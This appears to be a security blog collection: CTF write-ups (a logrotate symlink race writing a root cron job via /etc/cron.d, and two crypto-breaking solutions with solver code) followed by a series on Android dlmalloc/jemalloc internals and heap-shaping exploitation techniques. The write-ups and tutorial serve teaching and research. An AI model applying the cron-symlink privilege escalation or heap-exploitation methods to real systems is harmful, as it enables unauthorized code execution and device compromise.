  • mv /tmp/log /tmp/dummy && ln -s /etc/cron.d/ /tmp/log

By trying increasing X values for the delay, the race was won. 

Finally
ls -l /etc/cron.d/
-rw-r–r–     1 root root    logrotate
-rwxr-xr-x     1 user user    pwnme.log

Note that pwnme.log is executable, since logrotate created the file with the original permissions of the /tmp/log/pwnme.log, that, in turn, is under our control.

The end was trivially
echo “#!/bin/sh” >> /etc/cron.d/pwnme.log
echo cat /flag >> /etc/cron.d/pwnme.log
./run_cron
35c3_rotating_as_intended

After thoughts
The race was won pretty crudely, and it may also be the case, that we were “helped” by other people running in parallel on the same machine, attempting to solve this or other challenges.
We’re pretty sure that there are much better ways to win this race, perhaps using the inotify interface, or even if permitted, a fuse mount.
The inotify interface can reveal when files are created, indicating the right time to make the symbolic link.
A fuse mount over /tmp or /tmp/log can be used to block logrotate, and give ample time to create the symbolic link.
We would like to see other solutions to this challenge, and learn from them 🙂

 

Post Quantum

I will describe my solution to the “post quantum” crypto challenge from the 2018 CCC CTF.
We begin the challenge by downloading a tar.gz file containing two python scripts: “challenge.py”, “generate.py” and a directory called data. As always, we are requested to find the flag.

Let’s start by looking at generate.py:

from challenge import CodeBasedEncryptionScheme

from random import SystemRandom
from os import urandom



if __name__ == "__main__":
    cipher = CodeBasedEncryptionScheme.new()
    random = SystemRandom()
    for i in range(1024 + 512):
        pt = urandom(2)
        ct = cipher.encrypt(pt)
        with open("plaintext_{:03d}".format(i), "wb") as f:
            f.write(pt)
        with open("ciphertext_{:03d}".format(i), "wb") as f:
            f.write(ct)
        assert(pt == cipher.decrypt(ct))

    with open("flag.txt", "rb") as f:
       flag = f.read().strip()

    if len(flag) % 2 != 0:
        flag += b"\0"

    cts = list()
    for i in range(len(flag) // 2):
        cts.append(cipher.encrypt(flag[i*2:i*2 + 2]))

    for i, ct in enumerate(cts):
        with open("flag_{:02d}".format(i), "wb") as f:
            f.write(ct)

As we can see, the script initializes some kind of encryption object called cipher, and uses it to encrypt 1024+512 strings of length 2 bytes. Every plaintext string and every encryption of such string is stored in a separate file. The script then reads a file called “flag.txt” and encrypts every 2 bytes of it into a separate file. All of these files (except flag.txt) are found in the data directory.

At this point, we realize that given enough ciphertext samples and their corresponding plaintext, we should be able to somehow compute the encryption key and decrypt the encrypted flag files.
In order to do that, we need to analyze the file challenge.py that implements the encryption and decryption.

#!/usr/bin/python3

from BitVector import BitVector
from random import SystemRandom

inverse_error_probability = 3

def matrix_vector_multiply(columns, vector):
    cols = len(columns)
    assert(cols == len(vector))
    rows = len(columns[0])
    result = BitVector(size=rows)
    for i, bit in zip(range(cols), vector):
        assert(len(columns[i]) == rows)
        if bit == 1:
            result = result ^ columns[i]
    return result

def bitvector_to_bytes(bitvector):
    return bitvector.int_val().to_bytes(len(bitvector) // 8, 'big')

def bitvector_from_bytes(bytes):
    return BitVector(size=len(bytes) * 8, intVal = int.from_bytes(bytes, 'big'))

class CodeBasedEncryptionScheme(object):

    @classmethod
    def new(cls, bitlength=48):
        key = cls.keygen(bitlength)
        return cls(key)

    def __init__(self, key):
        self.key = key
        self.key_length = len(self.key)
        self.random = SystemRandom()

    @classmethod
    def keygen(cls, bitlength):
        key = SystemRandom().getrandbits(bitlength)
        key = BitVector(size=bitlength, intVal = key)
        return key

    def add_encoding(self, message):
        message = int.from_bytes(message, 'big')
        message = BitVector(size=self.key_length // 3, intVal=message)
        out = BitVector(size=self.key_length)
        for i, b in enumerate(message):
            out[i*3 + 0] = b
            out[i*3 + 1] = b
            out[i*3 + 2] = b
        return out


    def decode(self, message):
        out = BitVector(size=self.key_length // 3)
        for i in range(self.key_length // 3):
            if message[i * 3] == message[i * 3 + 1]:
                decoded_bit = message[i * 3]
            elif message[i * 3] == message[i * 3 + 2]:
                decoded_bit = message[i * 3]
            elif message[i * 3 + 1] == message [i * 3 + 2]:
                decoded_bit = message[i * 3 + 1]
            else:
                assert(False)
            out[i] = decoded_bit
        return bitvector_to_bytes(out)

    def encrypt(self, message):

        message = self.add_encoding(message)

        columns = [
            BitVector(
                size=self.key_length,
                intVal=self.random.getrandbits(self.key_length)
            )
            for _ in range(self.key_length)
        ]

        # compute the noiseless mask
        y = matrix_vector_multiply(columns, self.key)

        # mask the message
        y ^= message

        # add noise: make a third of all equations false
        for i in range(self.key_length // 3):
            noise_index = self.random.randrange(inverse_error_probability)
            y[i * 3 + noise_index] ^= 1

        columns = [bitvector_to_bytes(c) for c in columns]
        columns = b"".join(columns)

        return columns + bitvector_to_bytes(y)

    def decrypt(self, ciphertext):

        y = ciphertext[-self.key_length // 8:]
        columns = ciphertext[:-self.key_length // 8]
        columns = [
            bitvector_from_bytes(columns[i:i+self.key_length // 8])
            for i in range(0, len(columns), self.key_length // 8)
        ]
        y = bitvector_from_bytes(y)

        y ^= matrix_vector_multiply(columns, self.key)
        result = self.decode(y)
        return result

Just by looking at the names of the functions and variables, we can guess that we are facing an encryption scheme that uses some linear algebra (much like in the first challenge “unofficial”).

The encryption algorithm begins by “encoding” the input message by tripling every bit in it. That is, the input 00101 becomes 000000111000111.
It then generates 48 random columns, each containing 48 random bits and uses it as a 48×48 matrix over GF(2) (https://en.wikipedia.org/wiki/GF(2)). Then it multiplies this matrix with the key, which is a 48 bit random vector, and uses the result to mask the input message. Finally, the result is added with some noise that flips one random bit in every 3 sequential (non-overlapping) bits. The output of the encryption is the random 48×48 matrix and the masked+noised message. Let’s describe the encryption algorithm in a more “linear algebra” way:

  • y=Encode(Message) // this triples the bits. Assuming a 2 byte input, the result is a vector of length 48 over GF(2).
  • M=RandomMatrix(FieldSize=2,Dimention=48)
  • r=noise(48) // this generates the noise vector – in every 3 sequential bits, one equals 1 and the others are 0.
  • return(M,M⋅key+y+r)

As for the decryption – given (M,c) it computes y’=c+M⋅key . The plaintext is then reconstructed from y’ by applying “majority” on every 3 sequential bits.

How can we break this encryption?

Let’s first assume no noise was added. Then every pair of plaintext and ciphertext is providing us with equations of the form:

Here the only unknown values are the Key bits, and so we treat them as variables in our system of equations. We have 48 equations per ciphertext+plaintext pair and 48 variables (NOTE: the equations consist of random scalars and thus are most likely linearly independent). Solving this is pretty much straightforward (using SAGE, MATLAB or any other tool supporting simple linear algebra operations).

However, we have the noise added to the equations, so what do we do? We treat them as more variables!
The equations are of the form


Where r_k is a different variable in every equation. Seemingly we encounter another problem now – every equation adds another variable, so for k equations we have k+48 variables.
We do however know some more restrictions on the new variables r_k. We know that for every k≡0 mod(3):


This means that for every k original equations, we get additional k/3 equations and k+48 variables. Hence we only need to make sure that k≥48⋅3 and we are fine. For this it suffice to use only 3 or 4 pairs of ciphertext and plaintext files. This approach indeed solves the challenge!

Crypto Challenge – Unofficial

Original Challenge:

  • Solves: 35
  • The NSA gave us these packets, they said it should be just enough to break this crypto.

Challenge files

Difficulty estimate: medium

In the files we have one pcap file – surveillance.pcap which contains 40 TCP streams (wireshark → Statistics → Conversations)

When we follow the TCP stream – each stream looks very similar to this:

20779900528817692337799168797527459491 62670239152271854568281304556299175800 93353632585838558129339305409612190036 29275293709030893096906315031093475117 217443785766847465643965167326471366930 87768394800337534630670868726874169262 94272021819697638819758476484784437174 79761509873597193538805774586772152551 287077043474345536330292000256667722862 338545568968754066451781943973364050747 297369519464034454780797709549121754981 56885490048115174244568542056852168691 125409768592704189418754659727077855243 248903210971800661957902959437529720078 105198372128401404878582092383380684270 171346466625618610030275381510572715586 155477660830517170755561240929991575154 182673696836619568854491288432442673233 262702931683036291589579288667282098519 18870116631740236121991956018407513291 259639713869223969256075040261046227211 211759681449153548839999286208573748417 75564698223593131868793110465400517546 3957872548388281697136273156279603423 216645505172179755607682378174353919850 229968384683068856202657067569523090578 66739301027057081876758954753275857501 116367528061570402100923471061918655467 143750469825367138306146966620543701048 183518250254992484830711613992618112334 177659446112610152502618121534022672394 294880691868997745862235404753518785618 296817543478127190410821587158884107642 58918844088249738906048787671526281242 191823527475136131674233114644080652238 115153266167256987643478624321147128279 33028997731842108545265409344234591070 32020688555063599381439427034519438611 136800502151738819775273044156131929386 297262660200845071604521241820385548094
487839305465823234006845594602546874778491
ACCESS GRANTED
aef8c15e422dfb8443fc94aa9b5234383d8ee523d6da9c4875ccf0d2cf24b1c3fa234e90b9f9757862d242063dbd694806bc54582deddbcbcc

except one stream which is:

58557110956988947057604802588561896500 124389245447086365003181102994712842606 82395139655125145682424929123746759522 47649451703051529899277902695473539892 150981473550872530548663509246216281805 168563983740131744014317862124200995089 138586260804512475239450269675967207835 62436069859970279880393432647328777542 22913686979727780041806138144484753933 14377633287456896562041901004526098962 273196090090464520445990336716474469243 242168062305495710098626001414876184684 94362973583077677476509316957112725408 29088551100976965023442015189790524406 43231997455607345760204676007554876342 132361861464878302707174999703933345282 253872750092097302859318147550396944380 213628045569424246848985217725072451309 294344411139289978298406248909275102813 226888910812725047738767244100865543325 94082207521578531435238803168695213013 97111136227337754555078662768570661087 185250299454417634170420352961477926506 67438648618265917969789929448437485879 101682932749781295458233490525355462280 113556545381411565044202682512491580939 244226227037022039791321269794441569705 61030029875782065229041917864523517796 189182692689289560885216139521470329934 30211253278711272924044288553988214247 121622236650064002460174949909446201741 65301450599692169122475160199358409465 73053494341241445616892110693763168071 234683993955061111113773411581440059586 283639424985419487458121053850137768397 127760719714334178221109348661056530813 128791727498437259840522852285552430716 20843448351817739519520104708561322010 176162735964861803752894890674194111533 42645121406909462815210125923299652368
20122444954621613642609378528068231780800
ACCESS DENIED

We also have the python code for the server side:

server code:

import os, math, sys, binascii
from secrets import key, flag
from hashlib import sha256
from Crypto.Cipher import AES

p = 21652247421304131782679331804390761485569
bits = 128
N = 40

def rand():
    return int.from_bytes(os.urandom(bits // 8), 'little')

def keygen():
    return [rand() for _ in range(N)]

if __name__ == '__main__':
    #key = keygen()   # generated once & stored in secrets.py
    challenge = keygen()
    print(' '.join(map(str, challenge)))
    response = int(input())
    if response != sum(x*y%p for x, y in zip(challenge, key)):
        print('ACCESS DENIED')
        exit(1)

    print('ACCESS GRANTED')
    cipher = AES.new(
            sha256(' '.join(map(str, key)).encode('utf-8')).digest(),
            AES.MODE_CFB,
            b'\0'*16)
    print(binascii.hexlify(cipher.encrypt(flag)).decode('utf-8'))

 

Encryption Scheme:

The server send a random challenge – which is a list of N random numbers – each 128 bits long (16 bytes)

It expects a response  back which should be the result of the following calculation: Sum(Challenge[i]*Key[i] % p).

If it the response is correct – we get the flag encrypted with the key

first thought:

  • p is not really prime:
  • python -m primefac 21652247421304131782679331804390761485569
    21652247421304131782679331804390761485569: 311 311 313 313 317 317 331 331 337 337 347 347 349 349 353 353
    *8 different prime factors
    * each prime factor appears twice
  • Since we have the session data – we can use it to solve 40 equations with 40 variables – or at least we could – if we had 40 successful sessions – but we have only 39.
  • But we are working in the “Field” of modulus p – so we might not need all 40 equations…
    in the end – all you needed to do was solve the 39 equations…
  • We are not completely sure why but it appears that the 39 equations (congruences to be exact) are enough to span the whole vector space of the solutions.

using sage the solution looks like this (python2):

from Crypto.Cipher import AES
from matrix import *
from hashlib import sha256
import binascii

p = 21652247421304131782679331804390761485569 # 311 311 313 313 317 317 331 331 337 337 347 347 349 349 353 353
N = 40

R = IntegerModRing(p)
M = Matrix(R, [vector(R, ch) for ch in Challenges])
b = vector(R, Responses)
key = (M.solve_right(b))

flag = 'aef8c15e422dfb8443fc94aa9b5234383d8ee523d6da9c4875ccf0d2cf24b1c3fa234e90b9f9757862d242063dbd694806bc54582deddbcbcc'.decode('hex')

cipher = AES.new(
            sha256(' '.join(map(str, key)).encode('utf-8')).digest(),
            AES.MODE_CFB,
            b'\0'*16)
print 'solution'
print cipher.decrypt(flag)

 

where matrix is was generated by the following script: (python3)

import pyshark
cap = pyshark.FileCapture('surveillance.pcap')

N = 40
session_data = {}
for i in range(N):
    session_data[i] = b''

Challenges = []
Responses = []

for pkt in cap:
    try:
        session_data[int(pkt.tcp.stream)] += pkt.data.data.binary_value
    except AttributeError:
        pass

for i in range(N):
    data = session_data[i].split(b'\n')
    if data[2] == b'ACCESS GRANTED':
        Challenges.append([int(x) for x in data[0].split(b' ')])
        Responses.append(int(data[1]))

print ('Challenges = []')
print ('Responses = []')

for i in range(N-1):
    print ('Challenges.append(%s)' % (Challenges[i]))
    print ('Responses.append(%s) ' % (Responses[i]))

A Tale of Two Mallocs: On Android libc Allocators – Part 3 – exploitation

In the two previous posts of this series, we’ve discussed how the Android libc allocators work. In this last post of the series, we can try to determine what we need to do in order to exploit a heap memory corruption or use-after-free, in light of these allocators.

Exploiting these kinds of bugs is all about precise positioning of heap objects. We want to force certain objects to be allocated in specific locations in the heap, in order to form useful adjacencies for memory corruption, or reuse of a desired location for a use-after-free.

The operations performed in order to force the allocator to allocate the objects we want in the positions we want is known as heap shaping or heap ‘feng shui’. We essentially need to take advantage of our understanding of the inner workings of the allocator in order to allocate desired objects in the locations or with the adjacencies we desire.

One of the things which can really make a huge difference when implementing heap shaping for an exploit is having a way to visualize the heap: to see the various allocations in the context of the heap.

For this we need tools. These tools need not be especially complex. We don’t really need a fancy GUI to visualize regions or chunks. A simple tool which will allow us to inspect the heap state for a target process during exploit development will make an incredible difference.

As it happens, argp and vats presented a tool for visualizing the jemalloc heap at last year’s infiltrate. They later released the tool, which they call shadow, on github with support for both firefox’s standalone jemalloc and Android’s libc jemalloc. I highly recommend viewing their talk and using their tool. Shadow is a debugger plugin which allows you to view the various jemalloc structures in a textual table format. It really makes a big difference in understanding how the heap is behaving during exploit development.

Despite the fact that it is more than 30 years old, we were unable to find a similar visualization tool for dlmalloc at the time we were working on it. So we wrote one.

We’ve release shade, a dlmalloc visualization tool, on github at https://github.com/s1341/shade. The tool has an interface very similar to that of shadow.

You can request info about a given chunk using its address. This tells you the size of the chunk, its status and the segment to which it belongs.

You can get a quick picture of the chunks before and after your chunk using the dlaround command. This shows a table of chunks centered around your chunk, including their addresses, sizes and statuses.

Once you know a segment base address, you can use the dlsegment command to view all the chunks in that segment.

shade currently works only in gdb with Android’s libc dlmalloc in 32bit ARM processes. This is mostly because that has been what we’ve needed it for. Pull requests are, of course, more than welcome!

While preparing for this presentation, I found that the excellent ncc group released their own tool for visualizing dlmalloc heaps about 6 months ago. While I have not used it actively, it seems like a great tool.

Let’s get back to exploitation. For the purposes of this discussion, let’s assume that you have discovered a 0-day heap buffer overflow in application X. It’s time to exploit it.

Modern exploitation is hard. The Android system is one of the most heavily hardened platforms out there. Android devices implement a whole host of mitigations to make exploiting vulnerabilities  and gaining control of devices more difficult. Things like Address Space Layout Randomization, selinux and process sandboxing are designed to make end-to-end exploitation as painful as possible.

We can, however, overcome some of these mitigations by the generous application of persistence, creativity and luck. We usually end up breaking the exploitation down into a few steps, each of which uses a gadget of some sort.

Gadgets are specific exploitations of your vulnerability set to achieve one or more functionalities which can be chained together to create an end-to-end exploit. We usually need one or more gadgets to actually gain something useful. The gadgets might come from different ways of exploiting a single vulnerability, or from different vulnerabilities.

We usually need a relative read or write gadget to overcome ASLR, followed by arbitrary read/write or execute gadgets to gain code execution. Once we have code execution, we can try to escape sandboxing or to evade selinux.

How do we go about creating a gadget from a heap buffer overflow?

We do this with adjacency. What we want to do is to position the object containing the overflowable buffer just before another object, which we’ll call the gadget object]. We need to be able to trigger operations on that gadget object, which will, for example, use a pointer inside the object’s data structure to perform a read operation.

We can then cause the overflow, overwriting the pointer in the gadget object’s data structure with a pointer of our choice. We then trigger the read operation to read data at our desired pointer.

Using adjacency, we have created an arbitrary read gadget. We can use similar techniques to create write and execute gadgets. The key is to have a useful operation, which we can repurpose as a gadget by modifying object data through our overflow.

In order to achieve this adjacency, we need to shape the heap such that our exploitable object is allocated just before our gadget object.

Note that on dlmalloc the two objects can be of completely different sizes, as dlmalloc allows allocations of various sizes to be contiguous. For jemalloc, however, the overflow and gadget objects must be of the same size class, so that they will be allocated from the same bin, in the same run. This can greatly increase the complexity of exploitation on jemalloc, as it is necessary to find gadget objects which not only provide useful functions, but which fit in the right bin.

If you find an object which will work for jemalloc, it may work for dlmalloc too, but the reverse is not true.

So how do we go about performing the shaping necessary to get our objects allocated as desired? Remember that our interface to the allocator is very simple. We essentially only have the allocate and free operations. We need to use those to perform our shaping. What we need are some useful allocation primitives.

We need some way to cause the target application to perform allocations and frees. Usually we’ll look for some discrete, easily triggerable, functionality, such as processing of a particular kind of network packet, or usage of a particular kind of object, which performs allocations or frees as a side-effect of its normal operation.

It’s important that the primitive perform the allocation or free operation we want, at the time that we want it, so we can use it to gain control of the heap. A given exploitation might require more than one primitive.

The ideal primitive will allow us to allocate an arbitrary size, fill it with attacker controlled data and free it at a later stage with another application trigger.

Although the ideal primitive is the holy grail, we will often have to make do with lesser primitives. For example, a primitive which only allocates at a specific size, or one which allocates memory we cannot reliably free later. Some of these lesser primitives are more useful on jemalloc, some on dlmalloc.

The primitives you’ll find in your target app really depend on the specific details of the target app. They might be the result of sending certain types of packets to the target, performing operations in a scripting context such as javascript, or creating and freeing objects through higher level, more abstract, operations.

Finding good primitives is a bit of an art form. It is often necessary to reverse a lot of code before useful primitives can be found. So what should one look for?

You can start by looking for raw mallocs. These are probably the simplest primitives. A function which performs a raw malloc, either with a size you can control or of a fixed size can be a useful primitive. Sometimes the allocation will be for a multiple of a structure size.

Another good source of primitives are c++ classes which are allocated with the new operator. In most cases this new translates directly to a malloc for the size of the class. If you can easily trigger allocation and freeing of classes of interesting sizes, you have yourself an allocation primitive. These can also serve as excellent gadget objects.

Reallocs can also be a good source of primitives. They are often used with zero-length arrays in C structs in order to create variable length ‘contained’ arrays of sub objects. realloc is essentially the same as malloc.

If your target process uses the C++ standard template library, a good place to look for allocation primitives is in std::vectors. The growth of those vectors causes a ‘new’ behind the scenes which is essentially just a malloc. As the vector grows, it might fit into the size bin you are interested in. It may be necessary to add objects iteratively until the vector grows to the correct size.

std::string also uses malloc to allocate backing stores for the strings it contains. If you can allocate a std::string from a raw buffer, the size of which you control, you have an excellent primitive. Note however that std::strings are often passed by value, which causes their data to be copied into new allocations. This could be a source of ‘allocation noise’ which you might want to avoid.

In general, it’s necessary to think creatively about the accessible operations in your target in order to find the allocation primitives you need.

Let’s walk through an example exploitation with notes on some issues you might encounter on each of the allocators.

First, let’s define our asssumptions:

  • Let’s say we have discovered a buffer overflow in an object of size 0x4e0. We are able to overflow an arbitrary number of bytes with controlled data, starting from the overflowable buffer.
  • Let’s also say that we have discovered a useful gadget object, with size 0x450. This means this object will be in the same size class as the overflowable object.
  • Let’s also assume that we have discovered an allocation primitive which allows us to allocate at an arbitrary size
  • We’ve also got the ability to free any of the allocations we make with the allocation primitive
  • Finally, by performing an operation on the gadget object, we are able to determine if it has been overflowed or not.

We need to cause the overflowable object to be allocated immediately before the gadget object, using the allocation and free primitives to shape the heap.

The assumptions we’ve made are good assumptions. Without a gadget object in the same size class as the overflowable object, it is almost impossible to exploit a buffer overflow on jemalloc. Without an arbitrary size allocation primitive, it is very difficult to exploit on dlmalloc.

One technique for heap shaping that I’ve found particularly successful is called the placeholder technique.

The idea is simple. Using our arbitrary allocation primitive, we allocate a bunch of placeholder sets for our target objects, at the sizes of those objects. Each set of placeholders has a placeholder for the overflowable object and a placeholder for the gadget object. We hope that at least one set of placeholders is allocated such that the overflowable placeholder is directly before the gadget placeholder.

Next, we iterate over all of our placeholder sets, and for each set, we free the gadget placeholder and cause a gadget object to be allocated. Hopefully this gadget object will fall into the freed placeholder slot.

Then we once more iterate over each of our placeholder sets, this time freeing the overflowable placeholder, allocating our overflowable object and performing the overflow. We then activate the gadget for each instance of the gadget object, and use the result to determine if we have overflowed this instance or not. Hopefully at least one set of placeholders will have been turned into a working gadget.

This idea is the basis for the placeholder heap shaping technique. This technique can be used on both jemalloc and dlmalloc, but there are various things to look out for on each of the respective allocators.

One thing that can help increase the probability that one or more placeholder sets will have contiguous overflowable and gadget objects is to spray a large number of allocations of the relevant size class at the very beginning of the exploit. This will hopefully cause any best-fit chunks in the dlmalloc free lists or partially used runs in the relevant jemalloc bin to be used up, filling the holes. The placeholder allocations will then most probably be from new dlmalloc segments or new jemalloc runs, with successive allocations for the same size class falling after one another.

One problem you may encounter is that the allocation of the overflowable object, the gadget object or even the allocation primitives performs more than just the target allocation. In fact, it is very common for one or more of these to perform a bunch of smaller or bigger allocations around the actual target allocation we’re interested in.

These unwanted allocations shouldn’t make any difference when using jemalloc, as there we are concerned only with allocations in our bin.

On dlmalloc, these allocations might fall between the overflowable object and the gadget object, messing with our heap shaping.

Assuming the gadget object is the one which allocates the unwanted allocations, one way to deal with this issue is to do the following:

  • First, at the beginning of the exploit, we allocate a bunch of smaller blocks, let’s say 100 blocks of 0x100 bytes each
  • We then allocate all the placeholder sets
  • Then, for each placeholder set, we first free the gadget placeholder.
  • Then we free a few of the small filter allocations. These will be added to the free bins
  • Then we allocate the gadget itself, the smaller unwanted allocations will use the filter allocations we just freed, and the gadget itself will fall on the placeholder.

On dlmalloc, freeing a placeholder can cause it to be consolidated with an adjacent free chunk, resulting in it being placed in a larger bin’s free list. It then might not be used for the next allocation of the placeholder size. In other words, the placeholder will not be used to service the gadget or overflowable object allocation.

We can solve this quite easily using pinner allocations. The idea is that you simply allocate objects before your first placeholder and after your last placeholder. You never free these. As these pinners are always in use, and as we only ever free one placeholder in a set at a time, the placeholders will not be consolidated when freed.

Once you finally get your objects to be one after the other, there is an additional gotcha on dlmalloc. The metadata for the gadget chunk will be between your overflowable object and the gadget data. You need to overwrite this metadata with the sizes of the first and second objects respectively. Otherwise the allocator will fail when it comes time to free your chunks.

On jemalloc, the metadata is out-of-band, so this is not necessary.

Another thing to watch out for is that your primitive candidates may cause allocations or frees on threads other than the one which allocates your overflowable and gadget objects.  In fact, the overflowable and gadget objects might not be allocated on the same thread at all. So your placeholders might be allocated (and freed) by one thread, but the gadget or overflowable object will be allocated on another.

This shouldn’t present a problem for dlmalloc, but can be a significant pain on jemalloc.

The basic question is how can we move an allocation from one thread’s tcache to another thread.

One way to do this is to use flush events.

We free our desired placeholder region, r15. We then free up to 20 more regions on that same thread. This will fill up the tcache, resulting in a flush. The flush removes the oldest half of the tcache and marks those regions as free, making them available for other threads to allocate. We then allocate on our desired thread to get the region we want with the object content we need.

Note that the desired region might not be first in line on the thread which allocates the desired object. You might need to spray a bunch of allocations on that thread in order to catch the freed placeholder. Filling holes before allocating the placeholders can help prevent this issue.

Getting this right can be really complicated and is going to be very specific to your target, your vulnerability and the gadgets and primitives you find.

One thing to remember is that on jemalloc, the regions for your overflowable and gadget objects will be of the same size – the maximum size of this particular bin. This might be larger than the objects themselves, so when you overflow from your overflowable buffer, you need to pad that overflow with the difference between the overflowable object’s size and the bin size before you overflow any gadget object data.

On dlmalloc, the objects are directly after one another, except for the metadata between them.

On jemalloc it is possible that the threads that are involved in your exploitation are not assigned to the same arena. This can be problematic if, for example, you need to allocate contiguous regions in different threads.

Arena selection is supposed to use a round-robin approach, but in reality it will always allocate a new thread to the arena with the least threads assigned. If you can create and destroy threads somehow, before your overflow, you can do the following:

First add a whole bunch of threads to the system, say 30 threads. They will be spread evenly across the two arenas. Now destroy every second thread you created, causing one arena to have 15 threads and the other 0. Now allocate your exploitation threads. Up to 15 of them will be allocated in the same arena.

That’s about all I’ve got for you guys. I hope that I’ve given you a foundation in understanding how the Android libc allocators work, and that you’ve heard some tips regarding how to successfully exploit heap vulnerabilities on Android.

 

A Tale of Two Mallocs: On Android libc Allocators – Part 2 – jemalloc

In the first post of this series, we discussed why it is important to understand the inner workings of the libc heap allocator, and did a deep dive into the original Android libc allocator: dlmalloc. In this post, we’ll examine the allocator which replaced dlmalloc as Android’s allocator.

The new allocator selected by the bionic developers is called jemalloc. It is named after its implementer Jason Evans. Jason started implementing jemalloc in 2005. It was then added to FreeBSD’s libc to become that platform’s default allocator. In 2007, the Firefox Mozilla project adopted the stand-alone version of jemalloc as their primary allocator. Since 2009, jemalloc has been used extensively in Facebook’s backend servers. It’s currently maintained by a team at Facebook.

During May 2014, jemalloc was added to the bionic source tree for Android 5.0.0. dlmalloc continued to be the default, but it was possible to select this new heap implementation using a board config flag. In July 2014, jemalloc was made the default.

In an ideal world, every vendor of an Android phone would have made the transition to jemalloc with their Android 5.0.0 ROMS. Unfortunately, many vendors chose to remain with the tried and tested dlmalloc heap until later versions of Android. In fact I’ve seen dlmalloc being used on both lollipop and marshmallow devices. The fact that there is no clear line in time separating the two implementations means that you cannot really know a priori whether a given Android 5 or 6 device is using dlmalloc or jemalloc.

jemalloc was designed from the ground up to be highly-performant in symmetric-multi-processing environments. It has many features which are geared towards increasing efficiency and locality in multi-threaded apps, while reducing overall fragmentation.

The first important concept in jemalloc’s implementation is the arena. Each thread is assigned to a given arena, and it allocates and frees only from that arena. Each arena is completely separate from other arenas, and most importantly they have separate mutexs guarding their data structures. This means that you can actually perform allocator operations in parallel so long as the threads involved are assigned to different arenas.

In general jemalloc usage, there should be slightly more arenas then there are hardware cores. For some reason, on android, this is not the case. Instead there are exactly two arenas.

Threads are assigned to arenas in a round-robin fashion, which should ensure that the arenas have a more or less equal number of threads.

In jemalloc, memory is allocated from the operating system using mmap. Each mmap operation allocates a chunk. jemalloc chunks roughly correlate to dlmalloc segments. Chunks are all of the same size, 256k bytes on Android versions up to 7.0.0. From 7.0.0, chunks are 512kB for 32-bit processes and 2MB for 64-bit processes. Each chunk belongs to a specific arena. There is a chunk header containing metadata for this chunk, specifically including a pagemap which defines which pages are associated with which runs.

For any jemalloc managed address, the relevant chunk header can easily be found by simply rounding down the address to the chunk size. This means that we have o(1) lookups of metadata in most situations.

A run is an area of contiguous memory, located in a chunk. Each run contains a fixed number of regions of a specific size. Different size classes have different numbers of regions. Runs are always a multiple of the page size. Run metadata is stored in the chunk header for the chunk which contains them. In other words, the metadata is out-of-band. Each run has a bitmap which indicates the state of each region in the run. A region can either be in-use or free.

Regions are the smallest unit of the jemalloc system. These are analogous to dlmalloc chunks, except that regions do not carry any metadata at all. Instead each region belongs to a run of regions of the same size. The run stores the metadata for all its regions in the chunk’s header. The region address is the return value from a malloc call, and should be the argument to free.

jemalloc is, at its core, a bucket allocator. Each arena has a set of logical bins, each of which services a specific size class. Allocations are made from the bin with the smallest size large enough to fit the allocation request. On Android, there are 39 bins. By having a carefully selected and limited list of bin sizes, with small steps between them, fragmentation can be decreased.

Note that on dlmalloc, bins are used only as free lists. On jemalloc, bins are used for ALL allocations.

Bin metadata is stored in the arena structure. Each run is associated with a specific bin. Each bin has a ‘current’ run which points to the non-full run from which it is currently allocating. Here you can see the 39 bins for this arena, with their metadata addresses, size classes and current run pointers.

If a run becomes full during an allocation, jemalloc will check if there are any non-full runs for this bin in the arena. If more than one non-full runs exist, the one with the lowest address will be selected and set as the ‘current’ run. If no non-full runs are available in this bin, a new run will be created in either an existing chunk or in a new chunk, and that run will be set as the ‘current’ run of the bin.

Arenas keep track of their non-full runs and available chunk space using a set of red-black trees. Finding a non-full run or available space for a new run is thus at most an O(log(n)) operation.

jemalloc reduces lock contention in a few ways, thereby improving multi-threaded performance. Firstly, each arena has its own locks, so operations on different arenas do not contend for locks. Secondly, the critical time is very short. The lock only needs to be held when allocating new runs to a given bin, or when flipping the in-use bit of a region in a run. These mechanisms already make jemalloc significantly more thread-friendly than dlmalloc. However, Jason didn’t stop there. He also implemented thread specific caches.

For each thread, for each bin there is a tcache. The tcache is a list of recently freed regions for the specific bin and thread.

When allocating, jemalloc first looks to see if there is a region in the tcache for the required size’s bin before going to the ‘current’ run for that bin. If so, it uses that region.

When freeing a region, jemalloc pushes the region onto the tcache for the relevant bin. The tcache is LIFO.

Regions which are currently held in tcaches do not have their in-use bit set to free. Instead they are considered by the greater jemalloc system to be in-use. This saves on locks, as it is only necessary to grab a lock when updating global data structures. Thread specific data structures are by definition safe from other threads, and thus in many cases jemalloc allocations will not grab locks at all.

If jemalloc tries to allocate a region of a given size, and the thread’s tcache for that bin size is empty, a pre-fill event will occur. When prefilling, jemalloc will lock the arena mutex, ‘allocate’ a number of regions for this bin from the ‘current’ run, marking their bits in the run’s bitmaps as in-use, push these regions onto the thread’s tcache and release the lock. This ensures that there are always a ‘sane’ number of regions in a tcache, and significantly improves locality, as a given thread will allocate regions of the same size from mostly contiguous memory.

Each tcache has a maximum number of regions which it can contain. For small bins this is 8, and for larger bins this is 20. When we reach this maximum a flush event occurs. At a flush event, jemalloc takes the oldest half of the tcache’s regions and really frees them. I.e. it grabs the lock and marks the region’s bits as free. At this point they are free to be allocated by other threads.

In addition, jemalloc implements a ‘garbage collection’ mechanism. Essentially, jemalloc counts each allocation and free event. When that count reaches a certain threshold, a so-called ‘hard event’ occurs. Each ‘hard event’, jemalloc looks at a specific bin across all threads, and clears out three-quarters of the regions from the tcaches for that bin. During the next ‘hard event’ the next bin will be targeted for cleanup. This is another way that regions can be removed from tcaches and returned to general availability.

So when allocating on jemalloc, we observe the following flow.

  • We first calculate the bin for our request size
  • We then look in the tcache of the current thread for the calculated bin
  • If the tcache is empty, we prefill from the bin’s ‘current’ run
  • When the current run is exhausted, we prefill from the non-full run with the lowest address
  • If there are not enough regions in the existing non-full runs, a new run will be allocated in a chunk which has available space
  • If no space is available in a chunk, a new chunk is allocated from the system, and a new run is allocated in that chunk and is used to prefill the tcache.

So now we’ve covered the essential details of jemalloc.

Let’s compare some of the important properties of dlmalloc and jemalloc.

  • dlmalloc is a best-fit allocator while jemalloc is a bucket allocator
  • dlmalloc uses in-line metadata
  • user allocations on dlmalloc are called chunks, in jemalloc they’re called regions
  • dlmalloc allocates variable sized segments from the system, while jemalloc allocates fixed-sized chunks
  • jemalloc always allocates from fixed size regions. dlmalloc chunks can be arbitrary 8-byte aligned sizes,
  • In dlmalloc, adjacent allocations are usually not the same size. In jemalloc they are.
